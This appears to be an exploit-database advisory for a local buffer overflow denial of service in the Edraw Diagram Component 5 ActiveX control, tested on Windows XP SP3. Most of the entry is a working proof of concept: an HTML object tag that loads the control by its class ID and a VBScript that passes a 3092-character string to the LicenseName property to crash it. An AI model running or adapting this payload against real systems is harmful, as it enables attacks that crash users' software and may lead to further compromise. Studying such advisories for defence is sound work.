Edraw Diagram Component 5 ActiveX buffer overflow DoS

2012.02.05
Risk: Medium
Local: Yes
Remote: No
CVE: N/A
CWE: CWE-119

Author : Senator of Pirates This exploit tested on Windows Xp SP3 EN http://www.edrawsoft.com/download/EDBoardSetup.exe -------------------------------------------------------------------------------------------------------- <object classid='clsid:6116A7EC-B914-4CCE-B186-66E0EE7067CF' id='target' /> <script language='vbscript'> targetFile = "C:\Program Files\edboard\EDBoard.ocx" prototype = "Invoke_Unknown LicenseName As String" memberName = "LicenseName" progid = "EDBoardLib.EDBoard" argCount = 1 arg1=String(3092, "A") target.LicenseName = arg1 </script>

References:

http://www.edrawsoft.com/download/EDBoardSetup.exe


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top